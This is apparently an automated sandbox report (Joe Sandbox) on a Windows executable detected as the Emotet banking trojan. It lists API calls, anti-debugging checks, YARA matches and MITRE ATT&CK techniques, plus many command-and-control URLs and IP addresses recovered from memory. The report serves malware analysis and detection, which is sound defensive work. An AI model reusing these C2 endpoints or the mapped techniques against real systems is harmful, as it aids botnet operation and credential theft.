Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_009038B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,	2_2_009038B0

Source: provthrd.exe, 00000002.00000003.2331995247.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1711037124.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1825556739.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1744625653.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1771183581.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: provthrd.exe, 00000002.00000002.2728004191.00000000006C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWI
Source: provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Users\user\Desktop\ExeFile (360).exe	API call chain: ExitProcess graph end node			graph_0-51205
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	API call chain: ExitProcess graph end node			graph_2-50328

Source: C:\Windows\SysWOW64\dllhost\provthrd.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_0041203E FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

0_2_0041203E

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00694D00 mov eax, dword ptr fs:[00000030h]	0_2_00694D00
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00693E40 mov eax, dword ptr fs:[00000030h]	0_2_00693E40
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00540456 mov eax, dword ptr fs:[00000030h]	0_2_00540456
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054689E mov eax, dword ptr fs:[00000030h]	0_2_0054689E
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_0054095E mov eax, dword ptr fs:[00000030h]	0_2_0054095E
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_005459DE mov eax, dword ptr fs:[00000030h]	0_2_005459DE
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_02501030 mov eax, dword ptr fs:[00000030h]	0_2_02501030
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00904D00 mov eax, dword ptr fs:[00000030h]	2_2_00904D00
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00903E40 mov eax, dword ptr fs:[00000030h]	2_2_00903E40
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C0456 mov eax, dword ptr fs:[00000030h]	2_2_008C0456
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C689E mov eax, dword ptr fs:[00000030h]	2_2_008C689E
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C59DE mov eax, dword ptr fs:[00000030h]	2_2_008C59DE
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008C095E mov eax, dword ptr fs:[00000030h]	2_2_008C095E
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_008E1030 mov eax, dword ptr fs:[00000030h]	2_2_008E1030

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_006941C0 GetProcessHeap,RtlAllocateHeap,

0_2_006941C0

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00420316 SetUnhandledExceptionFilter,	0_2_00420316
Source: C:\Users\user\Desktop\ExeFile (360).exe	Code function: 0_2_00420328 SetUnhandledExceptionFilter,	0_2_00420328
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00420316 SetUnhandledExceptionFilter,	2_2_00420316
Source: C:\Windows\SysWOW64\dllhost\provthrd.exe	Code function: 2_2_00420328 SetUnhandledExceptionFilter,	2_2_00420328

Source: C:\Windows\SysWOW64\dllhost\provthrd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_004108B0 GetLocalTime,GetLocalTime,GetLocalTime,SendMessageA,

0_2_004108B0

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_0042112E GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_0042112E

Source: C:\Users\user\Desktop\ExeFile (360).exe

Code function: 0_2_0044B3CB GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

0_2_0044B3CB

Source: C:\Users\user\Desktop\ExeFile (360).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 0.2.ExeFile (360).exe.54279e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ExeFile (360).exe.690000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.8c279e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ExeFile (360).exe.54279e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ExeFile (360).exe.54052e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.900000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.8c279e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.8c052e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.provthrd.exe.8c052e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ExeFile (360).exe.54052e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1492453418.0000000002504000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1491620333.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2728136517.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2728254557.00000000008E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Service Execution	2 Windows Service	2 Windows Service	12 Masquerading	1 Input Capture	2 System Time Discovery	Remote Services	1 Screen Capture	22 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Process Injection	1 Process Injection	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	11 Archive Collected Data	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	16 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
ExeFile (360).exe	87%	ReversingLabs	Win32.Trojan.Emotet
ExeFile (360).exe	100%	Avira	TR/AD.Emotet.elhhc
ExeFile (360).exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/l	0%	Avira URL Cloud	safe
http://78.187.156.31/5S5kEp7rlV/JU/R	0%	Avira URL Cloud	safe
https://194.187.133.160:443/XG8n3jTZrFy/lHI9yRZ/	0%	Avira URL Cloud	safe
http://78.187.156.31/5S5kEp7rlV/stem32	0%	Avira URL Cloud	safe
http://94.23.216.33/7hdPY7r49/4nVUijhIy/I9yRZ/	0%	Avira URL Cloud	safe
http://172.91.208.86/m19rVa/	0%	Avira URL Cloud	safe
http://78.187.156.31/5S5kEp7rlV/	0%	Avira URL Cloud	safe
http://187.161.206.24/ImKmz54ud/lOnNJXoawXKn45K/	0%	Avira URL Cloud	safe
http://74.208.45.104:8080/ejCfJvV1/kxVOd5S1eQMg5w/THuO0hNhX41BMsZAJU/	0%	Avira URL Cloud	safe
http://172.91.208.86/m19rVa/%	0%	Avira URL Cloud	safe
http://134.209.36.254:8080/E3hL/	0%	Avira URL Cloud	safe
http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/c)	0%	Avira URL Cloud	safe
http://172.91.208.86/m19rVa//4nVUijhIy/e	0%	Avira URL Cloud	safe
http://74.219.172.26/8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/	0%	Avira URL Cloud	safe
http://78.187.156.31/5S5kEp7rlV/l	0%	Avira URL Cloud	safe
http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/J	0%	Avira URL Cloud	safe
http://194.187.133.160:443/XG8n3jTZrFy/lHI9yRZ/k	0%	Avira URL Cloud	safe
http://94.23.216.33/7hdPY7r49/4nVUijhIy/	0%	Avira URL Cloud	safe
http://120.138.30.150:8080/lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/a	0%	Avira URL Cloud	safe
http://194.187.133.160:443/XG8n3jTZrFy/lHI9yRZ/	0%	Avira URL Cloud	safe
http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/oOb	0%	Avira URL Cloud	safe
http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/TZrFy/lHI9yRZ/	0%	Avira URL Cloud	safe
http://172.91.208.86/m19rVa/J	0%	Avira URL Cloud	safe
http://104.156.59.7:8080/FLhkn5FxBNj/8yJJGMkkOjbevD3VkJc/chiAEdV6SWHfxYU9F5L/ueCJ8/	0%	Avira URL Cloud	safe
http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/	0%	Avira URL Cloud	safe
http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/	0%	Avira URL Cloud	safe
http://120.138.30.150:8080/lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/	0%	Avira URL Cloud	safe
http://94.23.216.33/7hdPY7r49/4nVUijhIy//	0%	Avira URL Cloud	safe
http://94.23.216.33/7hdPY7r49/4nVUijhIy/i	0%	Avira URL Cloud	safe
http://172.91.208.86/m19rVa/G	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
https://194.187.133.160:443/XG8n3jTZrFy/lHI9yRZ/	true	Avira URL Cloud: safe	unknown
http://172.91.208.86/m19rVa/	true	Avira URL Cloud: safe	unknown
http://187.161.206.24/ImKmz54ud/lOnNJXoawXKn45K/	true	Avira URL Cloud: safe	unknown
http://74.208.45.104:8080/ejCfJvV1/kxVOd5S1eQMg5w/THuO0hNhX41BMsZAJU/	true	Avira URL Cloud: safe	unknown
http://78.187.156.31/5S5kEp7rlV/	true	Avira URL Cloud: safe	unknown
http://134.209.36.254:8080/E3hL/	true	Avira URL Cloud: safe	unknown
http://74.219.172.26/8hLlZRoSuj4D/ksMu/9fBWMlkr3EKOS/	true	Avira URL Cloud: safe	unknown
http://94.23.216.33/7hdPY7r49/4nVUijhIy/	true	Avira URL Cloud: safe	unknown
http://104.156.59.7:8080/FLhkn5FxBNj/8yJJGMkkOjbevD3VkJc/chiAEdV6SWHfxYU9F5L/ueCJ8/	true	Avira URL Cloud: safe	unknown
http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/	true	Avira URL Cloud: safe	unknown
http://120.138.30.150:8080/lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/	true	Avira URL Cloud: safe	unknown
http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/l	provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://78.187.156.31/5S5kEp7rlV/JU/R	provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://78.187.156.31/5S5kEp7rlV/stem32	provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.23.216.33/7hdPY7r49/4nVUijhIy/I9yRZ/	provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://172.91.208.86/m19rVa/%	provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://172.91.208.86/m19rVa//4nVUijhIy/e	provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/c)	provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://78.187.156.31/5S5kEp7rlV/l	provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/J	provthrd.exe, 00000002.00000002.2728004191.000000000068E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.187.133.160:443/XG8n3jTZrFy/lHI9yRZ/k	provthrd.exe, 00000002.00000003.2331995247.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1825556739.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://120.138.30.150:8080/lU14Zt2m53k/H2EhTjamVycE7Ms/WrUPXLEjwgv/PuiLN1ozgyS2ZRE/a	provthrd.exe, 00000002.00000002.2728004191.00000000006C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.187.133.160:443/XG8n3jTZrFy/lHI9yRZ/	provthrd.exe, 00000002.00000003.1825556739.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.211.88.52:7080/qPRhI3AY6tivsBoVsOK/Kx7UvWvCn/s0eQH/CKvPQGj4EAYI/oOb	provthrd.exe, 00000002.00000002.2728829722.00000000029B4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://104.236.246.93:8080/k8c81KX7QFFfrFTdR/7RU5TsLAyuI8jjWiQtR/TZrFy/lHI9yRZ/	provthrd.exe, 00000002.00000003.2331995247.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp, provthrd.exe, 00000002.00000003.1825556739.0000000002BFD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://172.91.208.86/m19rVa/J	provthrd.exe, 00000002.00000002.2728924614.0000000002BFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://172.91.208.86/m19rVa/G	provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.23.216.33/7hdPY7r49/4nVUijhIy/i	provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://94.23.216.33/7hdPY7r49/4nVUijhIy//	provthrd.exe, 00000002.00000002.2728924614.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
94.200.114.161	unknown	United Arab Emirates	15802	DU-AS1AE	true
85.152.162.105	unknown	Spain	12946	TELECABLESpainES	true
174.102.48.180	unknown	United States	10796	TWC-10796-MIDWESTUS	true
169.239.182.217	unknown	South Africa	37153	xneeloZA	true
200.123.150.89	unknown	Argentina	16814	NSSSAAR	true
220.245.198.194	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
104.131.11.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.111.60.55	unknown	Ukraine	24703	UN-UKRAINE-ASKievUkraineUA	true
94.23.237.171	unknown	France	16276	OVHFR	true
187.161.206.24	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	true
139.162.108.71	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	true
156.155.166.221	unknown	South Africa	37611	AfrihostZA	true
104.32.141.43	unknown	United States	20001	TWC-20001-PACWESTUS	true
94.1.108.190	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	true
87.106.139.101	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
213.196.135.145	unknown	Switzerland	21040	DATAPARKCH	true
62.30.7.67	unknown	United Kingdom	5089	NTLGB	true
79.98.24.39	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
107.5.122.110	unknown	United States	7922	COMCAST-7922US	true
75.139.38.211	unknown	United States	20115	CHARTER-20115US	true
87.106.136.232	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
110.5.16.198	unknown	Japan	4685	ASAHI-NETAsahiNetJP	true
104.131.44.150	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
62.75.141.82	unknown	Germany	8972	GD-EMEA-DC-SXB1DE	true
124.41.215.226	unknown	Nepal	17501	WLINK-NEPAL-AS-APWorldLinkCommunicationsPvtLtdNP	true
172.91.208.86	unknown	United States	20001	TWC-20001-PACWESTUS	true
37.139.21.175	unknown	Netherlands	14061	DIGITALOCEAN-ASNUS	true
194.187.133.160	unknown	Bulgaria	13124	IBGCBG	true
24.43.99.75	unknown	United States	20001	TWC-20001-PACWESTUS	true
95.213.236.64	unknown	Russian Federation	49505	SELECTELRU	true
46.105.131.79	unknown	France	16276	OVHFR	true
139.130.242.43	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
82.80.155.43	unknown	Israel	8551	BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL	true
110.145.77.103	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
61.92.17.12	unknown	Hong Kong	9269	HKBN-AS-APHongKongBroadbandNetworkLtdHK	true
120.150.60.189	unknown	Australia	1221	ASN-TELSTRATelstraCorporationLtdAU	true
93.147.212.206	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
91.211.88.52	unknown	Ukraine	206638	HOSTFORYUA	true
68.188.112.97	unknown	United States	20115	CHARTER-20115US	true
153.232.188.106	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	true
140.186.212.146	unknown	United States	11232	MIDCO-NETUS	true
121.7.127.163	unknown	Singapore	9506	SINGTEL-FIBRESingtelFibreBroadbandSG	true
50.35.17.13	unknown	United States	27017	ZIPLY-FIBER-LEGACY-ASNUS	true
157.245.99.39	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
203.153.216.189	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
174.45.13.118	unknown	United States	33588	BRESNAN-33588US	true
162.241.242.173	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
85.105.205.77	unknown	Turkey	9121	TTNETTR	true
123.176.25.234	unknown	Maldives	7642	DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMV	true
74.120.55.163	unknown	Canada	32315	WJBTN-ASCA	true
50.91.114.38	unknown	United States	33363	BHN-33363US	true
200.114.213.233	unknown	Argentina	10318	TelecomArgentinaSAAR	true
78.24.219.147	unknown	Russian Federation	29182	THEFIRST-ASRU	true
24.179.13.119	unknown	United States	20115	CHARTER-20115US	true
104.156.59.7	unknown	United States	29802	HVC-ASUS	true
203.117.253.142	unknown	Singapore	9874	STARHUB-MOBILEStarHubLtdSG	true
201.173.217.124	unknown	Mexico	11888	TelevisionInternacionalSAdeCVMX	true
139.99.158.11	unknown	Canada	16276	OVHFR	true
134.209.36.254	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
195.251.213.56	unknown	Greece	12364	UOMGR	true
75.80.124.4	unknown	United States	20001	TWC-20001-PACWESTUS	true
121.124.124.40	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
47.144.21.12	unknown	United States	5650	FRONTIER-FRTRUS	true
139.59.60.244	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
61.19.246.238	unknown	Thailand	9335	CAT-CLOUD-APCATTelecomPublicCompanyLimitedTH	true
168.235.67.138	unknown	United States	3842	RAMNODEUS	true
139.59.67.118	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	true
137.59.187.107	unknown	Hong Kong	18106	VIEWQWEST-SG-APViewqwestPteLtdSG	true
219.74.18.66	unknown	Singapore	9506	SINGTEL-FIBRESingtelFibreBroadbandSG	true
78.187.156.31	unknown	Turkey	9121	TTNETTR	true
188.219.31.12	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
83.169.36.251	unknown	Germany	20773	GODADDYDE	true
74.134.41.124	unknown	United States	10796	TWC-10796-MIDWESTUS	true
5.196.74.210	unknown	France	16276	OVHFR	true
42.200.107.142	unknown	Hong Kong	4760	HKTIMS-APHKTLimitedHK	true
1.221.254.82	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
74.208.45.104	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
120.138.30.150	unknown	New Zealand	45179	SITEHOST-AS-APSiteHostNewZealandNZ	true
84.39.182.7	unknown	Spain	15704	AS15704ES	true
97.82.79.83	unknown	United States	20115	CHARTER-20115US	true
24.137.76.62	unknown	Canada	11260	EASTLINK-HSICA	true
82.225.49.121	unknown	France	12322	PROXADFR	true
37.187.72.193	unknown	France	16276	OVHFR	true
181.169.34.190	unknown	Argentina	10318	TelecomArgentinaSAAR	true
95.179.229.244	unknown	Netherlands	20473	AS-CHOOPAUS	true
109.74.5.95	unknown	Sweden	43948	GLESYS-ASSE	true
74.219.172.26	unknown	United States	5787	SNAPONSBSUS	true
79.137.83.50	unknown	France	16276	OVHFR	true
103.86.49.11	unknown	Thailand	58955	BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTH	true
209.141.54.221	unknown	United States	53667	PONYNETUS	true
89.216.122.92	unknown	Serbia	31042	SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemreze	true
185.94.252.104	unknown	Germany	197890	MEGASERVERS-DE	true
5.39.91.110	unknown	France	16276	OVHFR	true
137.119.36.33	unknown	United States	11426	TWC-11426-CAROLINASUS	true
104.236.246.93	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
94.23.216.33	unknown	France	16276	OVHFR	true
219.75.128.166	unknown	Japan	17511	OPTAGEOPTAGEIncJP	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1495906
Start date and time:	2024-08-20 17:45:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ExeFile (360).exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@0/97
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 64 Number of non-executed functions: 395
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: ExeFile (360).exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
174.102.48.180	ExeFile (145).exe	Get hash	malicious	Emotet	Browse
	ExeFile (156).exe	Get hash	malicious	Emotet	Browse
	ExeFile (196).exe	Get hash	malicious	Emotet	Browse
	KBDYAK.exe	Get hash	malicious	Emotet	Browse
	task1.exe	Get hash	malicious	Emotet	Browse
	task1.exe	Get hash	malicious	Emotet	Browse
	task1.exe	Get hash	malicious	Emotet	Browse
	task1.exe	Get hash	malicious	Emotet	Browse
	PHvqpLRfRl.exe	Get hash	malicious	Emotet	Browse
	NWMEaRqF7s.exe	Get hash	malicious	Emotet	Browse
94.200.114.161	ExeFile (226).exe	Get hash	malicious	Emotet	Browse	94.200.114.161/KN2k/QHavZNk7lTSx8eJLpbP/0vd7gjsQ5TsEb0Rcx/
94.200.114.161	ExeFile (106).exe	Get hash	malicious	Emotet	Browse	94.200.114.161/cHAjU/OuEQIhBlus38A7g/
85.152.162.105	ExeFile (226).exe	Get hash	malicious	Emotet	Browse
	ExeFile (145).exe	Get hash	malicious	Emotet	Browse
	ExeFile (156).exe	Get hash	malicious	Emotet	Browse
	ExeFile (196).exe	Get hash	malicious	Emotet	Browse
	ExeFile (106).exe	Get hash	malicious	Emotet	Browse
	KBDYAK.exe	Get hash	malicious	Emotet	Browse
	task1.exe	Get hash	malicious	Emotet	Browse
	task1.exe	Get hash	malicious	Emotet	Browse
	task1.exe	Get hash	malicious	Emotet	Browse
	task1.exe	Get hash	malicious	Emotet	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TWC-10796-MIDWESTUS	ExeFile (369).exe	Get hash	malicious	Emotet	Browse	74.136.144.133
	ExeFile (367).exe	Get hash	malicious	Emotet	Browse	72.135.200.124
	ExeFile (371).exe	Get hash	malicious	Emotet	Browse	74.136.144.133
	ExeFile (378).exe	Get hash	malicious	Emotet	Browse	74.136.144.133
	ExeFile (384).exe	Get hash	malicious	Emotet	Browse	174.100.27.229
	ExeFile (388).exe	Get hash	malicious	Emotet	Browse	66.61.94.36
	ExeFile (39).exe	Get hash	malicious	Emotet	Browse	66.61.94.36
	ExeFile (394).exe	Get hash	malicious	Emotet	Browse	74.135.120.91
	ExeFile (22).exe	Get hash	malicious	Emotet	Browse	71.72.196.159
	ExeFile (286).exe	Get hash	malicious	Emotet	Browse	74.135.120.91
